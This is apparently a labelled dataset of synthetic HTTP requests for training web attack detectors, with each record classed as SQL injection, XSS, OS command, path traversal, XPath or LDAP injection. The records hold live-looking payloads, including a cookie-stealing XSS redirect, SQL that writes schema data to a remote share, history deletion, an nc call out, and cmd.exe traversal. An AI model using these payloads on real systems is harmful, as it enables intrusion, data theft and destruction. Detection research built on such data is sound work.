ETag: "JZhlDTWGKEbF0bqOW33"
Expect: 100-continue
From: ricsu5la@emarau.st
If-Modified-Since: Mon, 01 Jun 09 03:38:39 CET
If-Unmodified-Since: Fri, 21 Jan 05 18:23:25 GMT
If-Match: *
If-None-Match: "KPyQYS3ZDOJzjYnPKR"
If-Range: Wed, 28 Feb 07 05:55:11 CET
Max-Forwards: 999
MIME-Version: 7.8
Pragma: 0KeaihmT='t9aart'
Proxy-Authorization: fnitn eCTeeuhe=Ltdusgh
Authorization: Digest opaque="tAte"
Range: -004662,03-,-2001
Referer: /wek2tr2/rwHae/e8ta/ztrdau.jsp
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/4.2 (X11; U; SunOS sun4u 7.6; n9-hW; rv:9.9.9) Gecko/15791777
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: FTP/5.7 172.19.228.35, 6.9 138.132.10.211
Transfer-Encoding: compress
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 17792276895005878262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37907
Start - Id: 35405
class: SqlInjection
GET /evnqlxbwEk.aspx?ihY3Eonr=34694&in3ynull=0975&uyDi8=e%2FHoeavAerhmluhome9kgP&maasea=V%40++tcHwindow.openteucnc&6pusrupdateZ=abh+t&Ai=OR++++%27ft%27+++IN+%28+%27+%27%29&noemnedt46iiwce=tofdaksaeoIf4a HTTP/1.1
Host: www.qatlha.uk
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.1
Accept-Language: ie-rtriTia8, onSho-hza, Osti3-t
Cache-Control: LllC=sqrb
Client-ip: 145.236.174.245
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="1"
Date: Sun, 14 Feb 10 20:56:54 UTC
ETag: "w.bssa@znOLYSv9"
Expect: tgymoi63
From: nceooR@ecnsnwaoq4.de
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: "ssNlss4K2-2ftHeQ7"
If-None-Match: *
If-Range: Tue, 03 Aug 04 10:24:38 UTC
Max-Forwards: 307
MIME-Version: 4.3
Pragma: ilmaI='rnS'
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: NTLM cndvc3RvZWJHZXNmZTU4cmJXaWRvYlNhaWFlMGdlZGk0UnVuNHA=
Range: -67
Referer: /ee1lh/hk9Halda.fgf
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/5.9 (X11; U; Linux i586 7.4; ee-gR; rv:4.5.9) Gecko/86265890
UA-CPU: 68000
UA-Disp: 678,1314,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 7.6 193.239.108.71, FTP/1.5 2.202.219.255, FTP/0.1 www.K2ghici6.jpg
Transfer-Encoding: sawwG; rPdgyO=te8eIg
Upgrade: cd4ali/2.0, 7coFhe/3.3, gftEc/8.2, AtJar/5.6, t7rii/7.9
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35405
Start - Id: 35893
class: XPathInjection
POST /unoeeidniiwSlraessq/uZ6boot.iniHx8/naimeioeh/@cmEWae@M.cat3WUK/k2t9/yirtK/zOGtZuMV33Ymt@g_2vY7/lrl/zL6bNaz4cQMD/HoM8le4setRire9doz/b2faioqddtdy4.jsp? HTTP/1.0
Content-Length: 109
Content-Language: pHsreNvd
Content-Encoding: deflate
Content-Location: /2nssri.bin
Content-MD5: bHRpbmF1bnJvcUVldmVDZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Aug 08 15:33:10 CET
Last-Modified: Tue, 16 Jun 09 14:19:33 CET
Host: 183.137.103.41
Connection: lkshr
Accept: video/mpeg;q=0.0, image/jpeg, audio/x-wav;q=0.9
Accept-Charset: gb2312;q=0.4, cp-950;q=0.3, shift_jis
Accept-Encoding: *
Accept-Language: 1177  or   hu/ihy4z/iat/child::node()[position()=019]  or    38055=
Cache-Control: max-age=216
Client-ip: 87.124.217.232
Cookie: oatisnyacn4=tDaz
Cookie2: $Version="20"
Date: Sun, 17 Sep 06 01:09:17 CET
ETag: "2bn9nUcmA5B69HaCVMzi"
Expect: xaxN=IldxnCx
From: sloeldwe@xNeaihyz.uk
If-Modified-Since: Sun, 11 Jan 04 18:30:13 UTC
If-Unmodified-Since: Mon, 27 Oct 08 06:39:33 CET
If-Match: *
If-None-Match: *
If-Range: "kWSFHgh03EUrieQen"
Max-Forwards: 08
Pragma: mu='sefl'
Proxy-Authorization: NTLM aXN0aWVyZW9nYWFwMnRhZXFheXRlOXB0czdiaGFhczVEZWFtb2xWaWxvYXJpbWNz
Authorization: Basic aG9zbnRxOmhlamFhZW4=
Range: -23690,93-568748,-273092
Referer: /fEphro/Nsn6sG.jsp
TE: gzip;q=0.4,deflate;q=0.2,gzip
Trailer: If-Match
User-Agent: stbPh5tr (opxdpqC; aRezI9o; t@yBY7mP2x; 7DHBaury)
UA-CPU: PowerPC
Via: FTP/6.1 www.iotanaaq.png
Transfer-Encoding: compress
Upgrade: isre/2.5, fTav/7.2, rrvnwi/3.7, gsd/4.7
Warning: 424 www.xto8ris.gif "1ioilnehhryaDn5sGe" "Sat, 21 Feb 04 10:37:48 GMT"
X-Serial-Number: 503350081562336
----: -------------

tNiGddm=eXeef&cyn=osh&tne=twleuK_UfN&LqiktfLq7=eDambf.H@4OR&cstdinpRUand@=qAi8nxe&hi2Itg=nso&zE=d@|I9bx

End - Id: 35893
Start - Id: 43549
class: OsCommanding
GET /eD.mT95m63gV/reeqoe/hz-gTzl7sqNcr2z/ieoV/z_5rsPfe3TfWjP31w/a@/or5esiem.jpg?oooi=aQbIV&ih9annrheanj=%27++%3B++rm++++%7E%2F.bash_history+++++%3B HTTP/1.1
Host: 167.207.120.119
Connection: close
Accept: text/html, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ofa0ts-ShmtnnI, pn0-na3heiaP;q=0.2, ihi5-fbee, eo8bihc-mlsre6di, rda-TI5ef;q=0.6
Cache-Control: max-stale=801
Client-ip: 214.70.1.175
Cookie: mtcaktjtsoRnl=ofrom;V@4PxVQ63=aJ_@OzJWwv3d;dd=55
Cookie2: $Version="425"
Date: Sat, 28 May 05 15:42:26 GMT
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: nsaoonaw@rhao6t.cz
If-Modified-Since: Sat, 10 Dec 05 16:02:59 GMT
If-Unmodified-Since: Thu, 29 Mar 07 05:04:12 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 34
MIME-Version: 9.7
Pragma: SRbdEojh='dtoobay'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: Basic cHR5YzczVGw6M3IzZWhyOGE=
Range: 510-
Referer: http://sasctsa.gov/shen.cfm
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.5 (X11; U; Linux i386 3.0; 5x-eh; rv:8.7.2) Gecko/96152605
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 559x227
Via: 8.5 131.17.146.193, 6.4 www.otiem0Rt.jpeg, HTTP/7.8 www.tec9.htm:6
Transfer-Encoding: compress
Upgrade: Bo4/0.1, iai/6.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 431097380
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43549
Start - Id: 47235
class: XSS
GET /wh0xiir/ne4owu.swf?seonattbwt=%3Cimg++++src%3D+++%22++arerstllor+%22onmouseover++++%3D+%22++++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.ve.com%2Fcgi-bin%2Feralsi.cgi%27%2Bdocument.cookie%29%3B%5D++%22+%3E&LI55eardcstn=88&dTeBwAtdsd6r=4qn&Ztutmcbscn=4dc%3Dnc9dr3et0&8aZservices4ENbAN=mailaeselectoliiantt8chN4dn7&esey6=Ko5rneA&ets3rp=ators&toa=lgincludef&eOba=eclu+Tvpg&etuEeth=24246935&E8t=%27in+o2xiimgEmaeL1%3Bti&esoyxtA67efiREh=odnd&uSeysjt=3ha5cMtD4h HTTP/1.0
Host: 239.168.185.203
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.3, x-mac-chinesesimp;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: l-rdEtl;q=0.6
Cache-Control: max-age=926
Client-ip: 226.163.167.76
Cookie: r6u=4639566;j0YdzUHM70=3;ioe39=l;i1desrbrmu1o=yhNq =gnSm-t 3between;biGlHnt=t2:
Cookie2: $Version="633"
Date: Fri, 05 Mar 10 18:47:05 GMT
ETag: W/"IpFYpz7hjp_CCGyUyX6"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Thu, 30 Sep 04 16:12:16 GMT
If-Unmodified-Since: Sun, 21 Oct 07 09:54:34 GMT
If-Match: "LtcuKYm7fV9WbEX7Rj"
If-None-Match: "Z4LV9FHYLJ8Svn8ND"
If-Range: Fri, 14 Dec 07 14:29:50 GMT
Max-Forwards: 2
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest response="53819Da8f4aCf6baeFB99dfFAfDaDCBc"
Authorization: NTLM bmFpdGFUcGwzYWJveXROZHVUY3RuYXAyd255Z3pBc29p
Range: -040129,-2915,414879-
Referer: /rosl.cgi
TE: gzip;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.2 (Windows; U; Windows NT 0.8; 71-ue; rv:1.9.6) Gecko/34742644
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7301x0518
Via: HTTP/7.8 149.51.45.48
Transfer-Encoding: deflate
Upgrade: sos/0.3, 9e6etg/6.5, wc2/6.5, nsbd/1.7
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 81818061997454
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47235
Start - Id: 37345
class: LdapInjection
GET /tTeeaEpdalralejrtuo/uc6DXh0QIgiPI-F9/n-EUzPp9Qoy3ZLuIO/70/ay0t8oxbvNHL8tTbq/wfLuHUmLhTH.d7DcKAIt/3b/oLWVZ@w5/udI@w6.JjJMxF/hohenltye/g-BtelnetVN6PV95boot.iniPy3.sh? HTTP/1.1
Host: www.sythhn5lf.uk
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, windows-1253
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 57.5.226.35
Cookie: ddtedmjkahas=147;cg1etEiTl=596594;eyeh=es+mocha
Cookie2: $Version="12"
Date: Mon, 25 Apr 05 09:35:10 CET
ETag: W/"jek.LKiVan3LxCi7px"
Expect: tweTge
From: elbo@eieuetfntT.fr
If-Modified-Since: Tue, 05 Aug 08 04:04:38 CET
If-Unmodified-Since: Tue, 02 Nov 04 14:04:13 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 7.2
Pragma: ex4kieet=5
Proxy-Authorization: NTLM N2RvZ3JvaElyc2k2Tjg4YjRhZjltbDh0dWo1aXllbGRJb2VzdWludmVl
Authorization: NTLM VG15ZWlQZWVjaGllbmZhdG9kUGUzZWFwMHRoNnVyQ2FhYW9qbGNwd3RK
Range: -04795,-66
Referer: /trhnhiu/ajatS4r/RnzeN8oE/it6d.jpg
TE: gzip,trailers
Trailer: Range
User-Agent: ab)(&(objectClass    = icin*)
UA-CPU: x86
UA-Disp: 654,6538,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: HTTP/4.7 www.rlhaes.tiff, aidr/6.7 www.qonp.html, HTTP/1.2 175.58.106.134
Transfer-Encoding: identity
Upgrade: nHa/4.2
Warning: 830 www.ane2.html:1 "vjdynls" "Sun, 23 Nov 08 23:13:16 CET"
X-Forwarded-For: 172.124.5.186
X-Serial-Number: 27736469943360301
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37345
Start - Id: 45116
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: 146.235.47.50
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 172.61.131.171
Cookie: ndeinet8izPIk=lrnM1;fni=0759297;PXxmlKl0r=cTS&es :++Atscriptnnwto 7;ot7ineN=4CPsb3y2
Cookie2: $Version="70"
Date: Fri, 22 May 09 20:25:51 UTC
ETag: W/"fCNJsPXSkO@bArMkGC"
Expect: uhxrdEf=ynXs4rl3
From: nsarxd@yvorsnirh0.be
If-Modified-Since: Fri, 16 Nov 07 06:27:34 UTC
If-Unmodified-Since: Wed, 11 Jul 07 03:45:24 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Dec 06 04:24:30 UTC
Max-Forwards: 4805
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Rnue 3unc=tstl
Range: -3,456-488022
Referer: /htpea2io.gz
TE: trailers
Trailer: Referer
User-Agent: Mozilla/5.6 (X11; U; SunOS sun4u 1.2; ee-en; rv:6.7.1) Gecko/04612336
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0464x327
Via: HTTP/4.7 255.126.210.187
Transfer-Encoding: gzip
Upgrade: nu7ne/3.2
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 785532867
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45116
Start - Id: 48037
class: XSS
GET /me6Qw.KjOfbc9/ia8.HB_FE1Uq6M494Xu1/0rtoaghorsws0inr9mat/cethnserUsuttgc/fdp6tAOhlimolrrrn.dll?deeptAaa=2rAb%22+++++%3E%3Cbody%2520onload%3Dalert+++%28document.cookie%29%3B+++%3E&4nltytrul9Oia=NtTayro3eval&unioni81VAd=928832&tnynhOb=eedoSTem&htsintrodpa=or7Heoitsh&8tl=865&Brt=n3Pe1DZcWy4F&se=%27ifn&PSZub37=124759772&sh=2220961202&JzUhG=ewp-%24&torieib0=%40w6&yee=hwK1r.&mloitaRxasbh=937&ezngoBCte5=btdt HTTP/1.1
Host: 76.138.217.238
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=830
Client-ip: 57.224.52.157
Cookie: GPckW=9185736;uo7uetushcN=uscriptaxmlEaa+o5et;LVUestdinOx6K5=86;nenedwcino3= atqo
Cookie2: $Version="85"
Date: Mon, 06 Feb 06 20:59:04 CET
ETag: W/".qoIWGMLllhfrRTCZtI"
Expect: 100-continue
From: uesois@ewrsoxtt.it
If-Modified-Since: Wed, 19 Aug 09 07:10:24 GMT
If-Unmodified-Since: Mon, 12 Apr 04 07:01:40 GMT
If-Match: "L.-Y4av_4D01@iUUh"
If-None-Match: "FxMNT_fPkXuak5Nm8"
If-Range: Thu, 20 Jul 06 11:31:49 GMT
Max-Forwards: 546
MIME-Version: 4.1
Pragma: e='7ebs'
Proxy-Authorization: Digest opaque="hyni"
Authorization: Basic Nmx3bm9oZTpFbW5vdHRj
Range: -108,-2477,99-66895
Referer: /tkTvf.tar.gz
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/6.4 (X11; U; Open BSD i586 4.0; hw-aD; rv:2.6.2) Gecko/56013966
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 717x263
Via: zirf/4.5 www.1f6n.html, 5.4 51.103.65.244:75652, 6.3 www.tu1s.jpeg
Transfer-Encoding: gzip
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48037
Start - Id: 45538
class: PathTransversal
GET /9nPtjtrttueOerml.shtml?srnIoE=b%3A%5Cwinnt%5Cboot.ini&oIlltniXeN=11032718&nss=eucd&spd=oyeunli&Cnc.kzKRDiNu=8&XscriptieFK=rr&Eevne=1062&LxCexecKdAL=af&FOerSnrtt=etdiv&TkA0MU=061313 HTTP/1.0
Host: 156.55.249.8:8
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=31
Client-ip: 32.239.48.70
Cookie: nbHn=wqe;YYzyuou_tPpf=cwbuse;Rk2deletestyleE0c7Jkf= leg
Cookie2: $Version="20"
Date: Wed, 03 Sep 08 14:33:48 UTC
ETag: "Ze@vy62aYSghPKIo"
Expect: 100-continue
From: muibee@Egtuem.uk
If-Modified-Since: Thu, 23 Apr 09 06:35:52 UTC
If-Unmodified-Since: Fri, 11 Mar 05 11:11:46 UTC
If-Match: "Ei-1w8cESN8ZjMTSry"
If-None-Match: "S@3pqppy8N3ysEXy1"
If-Range: *
Max-Forwards: 1080
MIME-Version: 3.3
Pragma: sa=lItz
Proxy-Authorization: enba eOsywabt=bulrtl
Authorization: 5Lsdai shnsRyd=i8hqCn
Range: 903-3,3-4324,-8
Referer: http://www.oun9eni.gov/iTED/andnoH/wgoru/ttfhhn.tiff
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.2 (Windows; U; Win 9x 2.1; ps-pz; rv:6.5.2) Gecko/79753982
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 589x0586
Via: 3.6 187.66.182.212
Transfer-Encoding: eonnEu
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 167.86.117.234
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45538
Start - Id: 43567
class: OsCommanding
GET /w6OmpL74zg9q9Iq4/eWCJN@52T7_/FWIZ4iwhereW2Ur/sZSzwp-/t@FE_V2/t13372xV_m@tdSK/RerTarqhsilhb0te6ase.swf?NxqbCKs=7u&Xmi-iframeSC0j=%29uehauOreplace&usg1yTe=xsnfhfases7bu&CatseqRgnth8evg=hghrs&boopt0.RF=riwHtonUm7mps0n+&diva2oetmRvhw=uY17RmsGZ&lmfqmL=ewl&ayc2sdcO=0&l9ledoSu4at7=02319126&Whpositiona=h%2F%26o&W%u@N8WW=92&uJobjectCYG=%250a++++nc++++www.chsi.com++++80++++%3B&incshahaon71ze=40&wsad8=dnBs59+1e&cgrr2Lde=25216 HTTP/1.1
Host: www.Dtyletm.com
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-icelandic;q=0.1, iso-8859-8-i, iso-8859-3, iso-10646-ucs-2;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: eo2sre-lnatFrim, is-e;q=0.6, r963h3o-8awl, i-fNaDe, ee0w-owrh;q=0.8
Cache-Control: wOo='72seeli'
Client-ip: 198.169.183.255
Cookie: eee1n=shle;lacm79nfwxocic=slsPtztwjmxas5
Cookie2: $Version="9"
Date: Wed, 15 Feb 06 23:00:16 CET
ETag: W/"5iLoNVknU2PXMAfL"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Mon, 15 Dec 08 23:30:43 UTC
If-Unmodified-Since: Fri, 09 Oct 09 09:27:29 CET
If-Match: *
If-None-Match: "CWcOYrCkZY-VeG5@VuNy"
If-Range: Thu, 13 Jul 06 22:21:31 UTC
Max-Forwards: 5524
MIME-Version: 0.1
Pragma: bs7='ustewDEw'
Proxy-Authorization: szoGA tiskrnt=veetaa
Authorization: Digest qop=auth
Range: -198504,6676-
Referer: http://rhnD.st/coovnce/oe77Ifsm.tar.gz
TE: deflate,gzip;q=0.2,trailers
Trailer: If-None-Match
User-Agent: oi8DfWi02 http://www.frdnroam.st
UA-CPU: x86
UA-Disp: 6029,0160,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4547x9829
Via: HTTP/4.9 www.rNon.tiff, rela/2.1 www.eAirsOhn.jpg, 6.0 www.brAtnmta.tiff
Transfer-Encoding: hTkard
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 562 www.w7dtbosr.jpg "TDeee9Afma0tOoes" 
X-Forwarded-For: 123.124.157.36
X-Serial-Number: 244245355
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43567
Start - Id: 36570
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 215.248.148.78:80
Connection: sae50
Accept: */*
Accept-Charset: x-mac-hebrew, windows-1255, iso-8859-7;q=0.2, koi8, x-mac-korean;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: ae6mn3=etmtsbt
Client-ip: 117.70.6.179
Cookie: h6=l=\
Cookie2: $Version="139"
Date: Mon, 27 Jul 09 18:37:22 UTC
ETag: W/"g8bltgAKXO5Z5rPL@p"
Expect: t4lai=ttegsbtg;8sil
From: osNAoh@aHn2nry.de
If-Modified-Since: Wed, 09 Apr 08 01:39:46 CET
If-Unmodified-Since: Sat, 06 Jun 09 15:46:16 GMT
If-Match: "f82VsZpd.HZDE.qc"
If-None-Match: *
If-Range: Sun, 10 Feb 08 16:20:36 UTC
Max-Forwards: 6498
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: tcpfic reesTpr=hh3orhdh
Range: -961935,910376-
Referer: /etlhU.cfm
TE: trailers,gzip;q=0.4,gzip
Trailer: If-Match
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 7.3; Xa-A3; rv:3.4.9) Gecko/82162258
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 529x915
Via: FTP/6.9 www.iodn.jpeg:866, 0.4 www.scCgn.jpg, 7.8 128.65.84.117
Transfer-Encoding: compress
Upgrade: t2w5X/9.8
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36570
Start - Id: 35062
class: SqlInjection
GET /jc3/avX4SBOZ/oeujs86hit/varQINrRtqWY/Pitrno2/Ywindow.open6nH2CP@53jt-v/child0xh/eK6VcRy.mdb?uvuH=997&ee0emrkztadld=5216&m3acgula=i9SXQ6q2pRT&osiifaer=nun+%24&paus8ndep0lere2=8762812586&2o9dxNu=%27%3B++EXEC++master..sp_makewebtask+++++%22%5C%5C13.47.94.224%5Cyi%5C6heue.css%22%2C+%22SELECT+++++*+FROM++++INFORMATION_SCHEMA.TABLES%22&eristlq=%3Br3o2vyhtacceslor6cy&5oe=oe%26&cityade0=neos3uenecen&tIrMMI@cat3ostdin=rC9jlRjV&ohNrtFau=o HTTP/1.0
Host: 136.46.183.207:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: iiep-4
Cache-Control: no-transform
Client-ip: 243.80.185.17
Cookie: avseo1n=8;fude9eecrt=2544;y@ZYqT7=3
Cookie2: $Version="63"
Date: Wed, 06 Jul 05 12:08:09 GMT
ETag: W/"01D.7MwmuewGPdIUlo"
Expect: 4en1t=spype;iksuo0L=mtJuin
From: tigt@7oor.cz
If-Modified-Since: Sun, 15 Jun 08 06:31:07 GMT
If-Unmodified-Since: Thu, 01 Apr 04 17:27:30 CET
If-Match: *
If-None-Match: "Dq4a30R8SBQMWsUr"
If-Range: Thu, 29 Jun 06 13:22:41 GMT
Max-Forwards: 64
MIME-Version: 0.3
Pragma: giAew=ndae0
Proxy-Authorization: Basic aFJpQzpidHN1bw==
Authorization: NTLM ZG15b2VlY3BpUGVtaDBlc2hzZTl0bHNVZXJjcnUwYWRybW5y
Range: 478-841920,54-454132
Referer: http://www.esYatnhe.net/k6eoohth/cRaedore/axEen/fijo.htm
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/2.7 (Machintosh; U; Mac OS X 5.9; lE-Ua; rv:3.4.1) Gecko/25504308
UA-CPU: 68000
UA-OS: Linux
UA-Color: color32
UA-Pixels: 989x6143
Via: HTTP/5.0 33.162.91.191:6, 4.8 www.tecj.jpg
Transfer-Encoding: gzip
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 825 www.eezs.png:4813 "dnlyiz8ddawi9eucren" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35062
Start - Id: 47368
class: XSS
GET /8X6JFx3uSmy6@I/TVp/ssl.gif?INQechocXz3bwwhere=nph-ol8n3gteugmsautoexects%7E+%7Ea&TnaimnemdMlio=script+alert++++%283theglomenknpa4.aust%29script&ohtoswnN=usu%29&aduteIe7er=aSeeexec%3Auhadmin%25ba&oEjestnx=2727688 HTTP/1.0
Host: 112.225.81.127
Connection: eareaevn
Accept: video/*;q=0.7, audio/*, text/*
Accept-Charset: *
Accept-Encoding: identity;q=0.6
Accept-Language: *;q=0.6
Cache-Control: min-fresh=2
Client-ip: 61.223.246.165
Cookie: o8rb=1453;Foeutiow=scuAcHHsrp(runwo;ihee=275561;dnraigahaelmw=011199
Cookie2: $Version="004"
Date: Mon, 03 Aug 09 14:58:07 CET
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: 100-continue
From: Rlpr@aeautrol.org
If-Modified-Since: Sun, 16 May 04 15:52:17 GMT
If-Unmodified-Since: Tue, 19 Jun 07 05:35:27 CET
If-Match: "bolaVc@GADCm-kwZJ"
If-None-Match: *
If-Range: Tue, 01 Jun 04 01:46:41 GMT
Max-Forwards: 1
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: e3ns peuba=sntTat
Range: 35419-,75138-2674,165640-
Referer: http://www.eejd.uk/nrfra/lnSinro/amanreEn/etu3c/o5npSs.nsf
TE: deflate,trailers
Trailer: Trailer
User-Agent: ettImc (hXeErL_hC8; ranYA5; vBuie06x; l6gyJNEj; u3QjDuo)
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 605x5902
Via: HTTP/7.6 www.ecligt.htm
Transfer-Encoding: deflate
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47368
Start - Id: 38051
class: LdapInjection
GET /al6JNWSP3.V-7/eUi.html?uTb=7550%29%28%26%28objectClass%3Dalc%29%28%7C%28sn+++%3D++dtes%29%28cn%3Djao+J*%29%29 HTTP/1.1
Host: 189.118.169.154:80
Connection: hrrd0
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 26.50.164.170
Cookie: ci3SNkutH2Kvse=rstprocessing-instructionA1F=echoa;f4eest=t:D(u8l ohu;ess=d0a7hpi8n
Cookie2: $Version="54"
Date: Wed, 10 Dec 08 21:07:54 CET
ETag: W/"xYZoPZGX1onU_eKg0nd"
Expect: oTo0xsi=menaree;nEnewski
From: iaoHwaa@inosaaos.gov
If-Modified-Since: Fri, 23 Apr 10 02:03:29 CET
If-Unmodified-Since: Sun, 27 Jun 04 20:53:02 UTC
If-Match: "C-FHXRU04yRTEm0qt0n"
If-None-Match: *
If-Range: *
Max-Forwards: 3789
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest cnonce="cz8e8weo"
Range: 6583-,350-4,-7502
Referer: /esbXto.jpg
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: miutreu (iuCRpOyMJ; tc5@Hknqz; hwdjU4QtqE)
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: 5n36a/5.4 183.119.213.129, 3.9 146.67.78.34
Transfer-Encoding: identity
